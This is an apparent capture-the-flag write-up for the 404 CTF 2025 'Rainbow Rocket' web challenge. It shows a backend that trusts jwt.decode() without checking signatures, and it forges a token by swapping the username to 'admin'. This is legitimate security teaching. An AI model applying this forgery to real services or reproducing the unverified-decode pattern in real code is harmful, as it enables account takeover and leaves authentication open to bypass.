Post

Rainbow Rocket | 404 CTF 2025

Posted
By Debrunbaix
1 min read
Rainbow Rocket | 404 CTF 2025

Rainbow Rocket

Ressources

URL : https://rainbow-rocket.404ctf.fr FILE : rainbow-rocket.zip - Frontend - Backend

Exploration

We read the route :

1
2
3
4
5

router.post('/register', registerUser);
router.post('/login', loginUser);
router.get('/profile', getProfile);
router.post('/verification', verification);
router.get('/flag', flag);

We can see a /flag route but we can’t access this page without account.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

const flag = (req, res) => {
  const authHeader = req.headers.authorization;
  if (!authHeader) return res.status(401).json({ error: 'Unauthorized' });

  const token = authHeader.split(' ')[1];
  try {
    const decoded = jwt.decode(token);
    if (decoded?.username === 'admin') {
      return res.json({ flag: process.env.FLAG });
    } else {
      return res.status(403).json({ error: 'Forbidden' });
    }
  } catch (err) {
    return res.status(400).json({ error: 'Invalid token' });
  }
};

We need to be admin to access the flag. We can see that the token is decoded with jwt.decode(token) and we can see that the username is checked.

We need to get an account or tho find a way to connect as admin.

Exploitation

In register we create T3stT3st account with same password

I can’t access the page but we can read the token used :

1

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IlQzc3RUM3N0IiwiaWF0IjoxNzQ3MTM1NDY4fQ.d_Hlr_SbLpRSWE9mRTPt0ozuY1L04bKloCA1V1Rfu6zaSsJS7O08xv-XRfA9sL-HCzVtHsiEROpbf4pxnL9dY3tgnF5Xd5Sh-0wh5ZlYfLa2Lo6kSiG4C036o-a6tVR4Uo6lucf36hh5X31HtVmqE7ON843X9ME3ot-XN9bB41VLLRAJS-EKneAEufO8l6ICa9c4SkmT1o9ut63ZcWgrXDDB8wD7BlShI9lgLICRjYVAiEAohpQn5iN262pJbfpR9q0icXBdKMgHDIPYtokyPTyCjlsm4kXiOp4uWdpTaQZb2yCiGy1vXNe6gapYCe3NEP8UIht8QL1FqoQIeZ8eLw

we can decode it :

1
2
3
4

{
  "alg": "RS256",
  "typ": "JWT"
}

Payload

1
2
3
4

{
  "username": "T3stT3st",
  "iat": 1747135468
}

maybe we can just replace “T3stT3st” with “admin” and retry to enter the page.

we only need to change the payload so let base64 this :

1
2
3
4

{
    "username": "admin",
    "iat": 1747135468
}

we get this ewogICAgInVzZXJuYW1lIjogImFkbWluIiwKICAgICJpYXQiOiAxNzQ3MTM1NDY4Cn0K

it works we get the flag.

CTF, Web
CTF Web 404CTF
This post is licensed under CC BY 4.0 by the author.